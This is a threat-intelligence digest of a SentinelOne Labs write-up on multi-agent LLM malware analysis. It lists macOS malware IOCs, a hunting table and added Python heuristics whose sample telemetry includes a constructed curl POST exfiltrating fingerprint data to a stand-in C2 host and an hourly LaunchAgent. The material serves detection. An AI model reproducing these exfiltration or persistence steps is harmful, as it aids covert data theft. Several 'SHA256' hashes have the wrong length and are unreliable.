Building an Adversarial Consensus Engine | Multi-Agent LLMs for Automated Malware Analysis
SentinelOne Labs developed a multi-agent LLM architecture using OpenClaw and Claude models to automate malware reverse engineering. By employing a serial consensus pipeline with an active rejection mandate, the system forces independent tool agents (radare2, Ghidra, Binary Ninja, IDA Pro) to cross-validate findings, significantly reducing decompiler artifacts and hallucinations.
Authors: SentinelOne Labs
Source: SentinelOne
- filename: /api/req/res - SysJoker C2 API endpoint identified during analysis.
- sha256: 60c8128c48aac890a6d01448d1829a6edcdce0d2 - WizardUpdate macOS malware sample.
- sha256: f5149543014e5b1bd7030711fd5c7d2a4bef0c2f - SysJoker macOS malware sample.
- url: hxxps://eve[.]inspectorcleaner[.]com/vnt - C2 beacon endpoint used for exfiltrating system fingerprint data (event, machine, url, os_name, os_version).
Key Takeaways
- Multi-agent LLM architectures using serial consensus pipelines significantly reduce hallucinations in automated malware analysis.
- An 'Active Rejection Mandate' forces LLM agents to peer-review and explicitly reject decompiler artifacts from other tools.
- Deterministic bridge scripts are preferred over Model Context Protocol (MCP) for batch analysis due to lower latency and comprehensive extraction.
- Testing on macOS malware demonstrated the system's ability to cross-validate XOR-obfuscated payloads, hidden execution paths, and C2 endpoints.
Affected Systems
- macOS
Attack Chain
The analyzed macOS malware utilizes XOR-obfuscated payloads to hide its core capabilities from static analysis. Upon execution, it performs system fingerprinting by collecting the username, hardware UUID, and macOS version. It establishes persistence via a LaunchAgent plist configured to run hourly. Finally, it beacons to a remote C2 server using curl to exfiltrate the collected system data and potentially download further payloads via ditto archive extraction.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article focuses on automated malware analysis methodology and does not provide specific detection rules.
Detection Engineering Assessment
- EDR Visibility: High — EDRs on macOS can effectively monitor process executions like curl and ditto, as well as file modifications in LaunchAgents directories.
- Network Visibility: Medium — C2 traffic is HTTPS (curl POST), limiting payload inspection without SSL decryption, but domain and IP connections are visible.
- Detection Difficulty: Moderate — While the payload strings are XOR obfuscated, the behavioral indicators (LaunchAgent creation, curl POSTs, ditto extraction) are standard and detectable.
Required Log Sources
- Process Execution Logs
- File Creation Logs
- Network Connection Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for curl executions making POST requests with JSON payloads containing system fingerprinting data (event, machine, url, os_name). | Process Execution, Network Connections | Exfiltration | Low |
| Monitor for the creation of LaunchAgent plist files with RunAtLoad set to true and a StartInterval of 3600. | File Creation | Persistence | Medium |
| Hunt for processes querying the QuarantineEventsV2 database to extract download URLs. | File Access, Process Execution | Discovery | Low |
| Detect the use of 'ditto -x -k' for silent archive extraction in suspicious contexts or by unexpected parent processes. | Process Execution | Execution | Medium |
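As an added example (not code from the article or from SentinelOne Labs), the following Python turns three of the hunting hypotheses above into heuristics that run over a small set of constructed telemetry records: a curl POST whose JSON body carries the fingerprint fields, a `ditto -x -k` extraction from an unexpected parent, and a LaunchAgent plist with RunAtLoad true and StartInterval 3600. The record field names (type, parent, cmdline, path, content), the parent-process baseline for ditto, and every sample value are assumptions.

```python
"""Hunting heuristics for the macOS behaviours in the hypotheses table.

Added example, not SentinelOne's code. The telemetry schema, the ditto
parent baseline and all sample values below are assumptions.
"""
import json
import os
import plistlib
import shlex
from xml.parsers.expat import ExpatError

# JSON keys the article lists for the beacon body.
FINGERPRINT_FIELDS = {"event", "machine", "url", "os_name", "os_version"}

# Assumed baseline of parents that legitimately run `ditto -x -k`; tune per fleet.
DITTO_EXPECTED_PARENTS = {"Installer", "installd", "Xcode"}


def _argv(cmdline):
    """Tokenise a recorded command line; unbalanced quotes yield an empty list."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return []


def curl_fingerprint_post(cmdline, min_fields=3):
    """Hypothesis 1: curl POST whose JSON body carries fingerprint fields."""
    argv = _argv(cmdline)
    if not argv or os.path.basename(argv[0]) != "curl":
        return False
    is_post, bodies = False, []
    for i, arg in enumerate(argv[:-1]):
        nxt = argv[i + 1]
        if arg in ("-X", "--request") and nxt.upper() == "POST":
            is_post = True
        elif arg in ("-d", "--data", "--data-raw", "--data-binary"):
            is_post = True  # any -d variant makes curl send a POST by default
            bodies.append(nxt)
    for body in bodies:
        try:
            doc = json.loads(body)
        except ValueError:
            continue
        if isinstance(doc, dict) and len(FINGERPRINT_FIELDS & set(doc)) >= min_fields:
            return is_post
    return False


def ditto_silent_extract(cmdline, parent):
    """Hypothesis 4: `ditto -x -k` (or combined -xk) from an unexpected parent."""
    argv = _argv(cmdline)
    if not argv or os.path.basename(argv[0]) != "ditto":
        return False
    flags = set()
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--"):
            flags.update(arg[1:])  # "-x -k" and "-xk" both become {'x', 'k'}
    return {"x", "k"} <= flags and parent not in DITTO_EXPECTED_PARENTS


def hourly_launchagent(path, content):
    """Hypothesis 2: LaunchAgent plist with RunAtLoad true and StartInterval 3600."""
    if "/Library/LaunchAgents/" not in path or not path.endswith(".plist"):
        return False
    try:
        doc = plistlib.loads(content)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return False
    return (isinstance(doc, dict) and doc.get("RunAtLoad") is True
            and doc.get("StartInterval") == 3600)


def hunt(events):
    """Apply all heuristics; return (hypothesis name, event index) pairs."""
    hits = []
    for idx, ev in enumerate(events):
        if ev.get("type") == "process":
            if curl_fingerprint_post(ev.get("cmdline", "")):
                hits.append(("curl_fingerprint_post", idx))
            if ditto_silent_extract(ev.get("cmdline", ""), ev.get("parent", "")):
                hits.append(("ditto_silent_extract", idx))
        elif ev.get("type") == "file":
            if hourly_launchagent(ev.get("path", ""), ev.get("content", b"")):
                hits.append(("hourly_launchagent", idx))
    return hits


# Constructed sample telemetry; hosts use the reserved .invalid TLD.
_BEACON_BODY = json.dumps({"event": "ping", "machine": "UUID-CONSTRUCTED",
                           "url": "https://dl.example.invalid/a.zip",
                           "os_name": "macOS", "os_version": "14.2"})
SAMPLE_EVENTS = [
    {"type": "process", "parent": "bash",
     "cmdline": "curl -s -X POST -H 'Content-Type: application/json' -d "
                + shlex.quote(_BEACON_BODY) + " https://c2.example.invalid/vnt"},
    {"type": "process", "parent": "Safari", "cmdline": "curl -s https://example.org/"},
    {"type": "process", "parent": "bash", "cmdline": "ditto -x -k /tmp/update.zip /tmp/update"},
    {"type": "process", "parent": "Installer", "cmdline": "ditto -xk /tmp/pkg.zip /Applications"},
    {"type": "file", "path": "/Users/alice/Library/LaunchAgents/com.constructed.update.plist",
     "content": plistlib.dumps({"Label": "com.constructed.update",
                                "ProgramArguments": ["/bin/bash", "-c", "/tmp/update/run.sh"],
                                "RunAtLoad": True, "StartInterval": 3600})},
    {"type": "file", "path": "/Users/alice/Library/LaunchAgents/com.vendor.sync.plist",
     "content": plistlib.dumps({"Label": "com.vendor.sync",
                                "RunAtLoad": True, "StartInterval": 86400})},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The curl rule keys on the body rather than the destination, so it still fires if the C2 domain rotates; the plist rule requires both RunAtLoad and the exact 3600-second interval, which is why the daily vendor agent in the sample is not flagged and the table rates that hypothesis at medium FP risk.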
Control Gaps
- Static analysis tools may miss capabilities hidden behind XOR obfuscation without dynamic execution or advanced multi-tool consensus.
Key Behavioral Indicators
- ditto -x -k execution
- curl POST to unknown domains
- LaunchAgent creation with specific intervals
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Block the identified C2 domain (eve.inspectorcleaner.com) at the network perimeter.
- Hunt for the provided SHA256 hashes in the environment to identify potential compromises.
Infrastructure Hardening
- Implement strict egress filtering to prevent unauthorized curl communications to unknown external domains.
User Protection
- Ensure macOS endpoints are running modern EDR solutions capable of monitoring LaunchAgent persistence mechanisms.
Security Awareness
- N/A
MITRE ATT&CK Mapping
- T1027 - Obfuscated Files or Information
- T1140 - Deobfuscate/Decode Files or Information
- T1082 - System Information Discovery
- T1543.001 - Create or Modify System Process: Launch Agent
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1071.001 - Application Layer Protocol: Web Protocols
Additional IOCs
- Domains:
eve[.]inspectorcleaner[.]com - C2 domain extracted from malware payload.
- Urls:
hxxps://eve[.]inspectorcleaner[.]com/vnt - C2 beacon endpoint.
- File Hashes:
60c8128c48aac890a6d01448d1829a6edcdce0d2 (SHA256) - WizardUpdate sample
678aa572faa73f6873d24f24e423d315e7eb2c2d (SHA256) - Go Infostealer sample
ad7d2eb98ea4ddc7700db786aadb796b286da04 (SHA256) - FinderRAT sample
f5149543014e5b1bd7030711fd5c7d2a4bef0c2f (SHA256) - SysJoker sample
- File Paths:
/bin/bash - Hidden execution path utilized by the malware.
/api/req/res - SysJoker C2 API endpoint.
- Command Lines:
curl POST - Purpose: C2 beaconing and data exfiltration | Tools: curl | Stage: Exfiltration
ditto -x -k - Purpose: Archive extraction for payload delivery | Tools: ditto | Stage: Execution
- Other:
QuarantineEventsV2 - macOS Quarantine database queried by the malware to find its own download URL.
OIUSYTASVBNMOPASDCCVBNZAXX - XOR key used for string obfuscation.